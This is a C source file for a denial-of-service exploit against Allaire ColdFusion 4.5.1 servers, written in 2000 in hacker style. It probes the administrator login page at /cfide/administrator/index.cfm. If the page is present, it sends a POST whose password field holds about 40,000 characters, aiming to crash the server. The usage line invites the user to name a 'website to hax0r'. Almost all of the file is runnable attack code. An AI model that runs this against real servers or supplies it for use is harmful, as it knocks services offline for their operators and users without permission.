/* [yl-cfDoS.c]

title:    [cold fusion 4.5.1 ereeu DoS attack]
date:    06.11.2000
author:    ytcracker[phed@felons.org]
comments:  allaire[www.allaire.com]'s cold fusion webserver seemingly
    has an odd little bug in it where it suffers from a denial
    of service attack when the administrator panel is accessed
    using a character post of greater than 4o,ooo characters.

    if your password is 4o,ooo or more characters, i suggest
    that you change your password immediately.

    usage: ./yl-cfDoS [website to hax0r]
shouts:  seven one nine.  master p and the no limit army.  geese.
credit:  foundstone for the buqtraq advisory.

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/param.h>

int main(int argc, char **argv)
{
  int sock;
  unsigned long vulnip;

  struct in_addr addr;
  struct sockaddr_in sin;
  struct hostent *he;
  
  char *detect;
  char buffer[1024];
  char cfhack[]="POST /cfide/administrator/index.cfm HTTP/1.0\n\nReferer: http://www.csanetworks.com\nUser-Agent: ytCracker vo.1 (ytCLinux 5.o)\n";
  char cfchars[40001];
  char cfdos[40050];
  
  printf("\n [cf 4.5.1 DoS] [ytcracker] [phed@felons.org]\n");

  if(argc<2)
  {
    printf(" usage: %s [vulnerable website]\n\n",argv[0]);
    exit(0);
  }

  if ((he=gethostbyname(argv[1])) == NULL)
  {
    herror("gethostbyname");
    exit(0);
  }

  vulnip=inet_addr(argv[1]);
      vulnip=ntohl(vulnip);

  sock=socket(AF_INET, SOCK_STREAM, 0);
  bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
  sin.sin_family=AF_INET;
  sin.sin_port=htons(80);

  if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
  {  
    perror("connect");
  }

  send(sock, cfhack,strlen(cfhack),0);
  recv(sock, buffer, sizeof(buffer),0);
  detect = strstr(buffer,"404");
  close(sock);
     
  if( detect != NULL)
        {
    printf(" vulnerabilty not detected.\n\n");
    exit(0);
        }
  else
    printf(" vulnerability detected.\n");

    printf(" sending crash data.\n");

  memset(cfchars,89,sizeof(cfchars));
  sprintf(cfdos,"%s\nPasswordProvided=%s\n\n\n",cfhack,cfchars);

  vulnip=inet_addr(argv[1]);
      vulnip=ntohl(vulnip);

  sock=socket(AF_INET, SOCK_STREAM, 0);
  bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
  sin.sin_family=AF_INET;
  sin.sin_port=htons(80);

  if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
  {  
    perror("connect");
  }

  send(sock,cfdos,strlen(cfdos),0);
  close(sock);

  printf(" data sent!\n\n");
  return 0;
}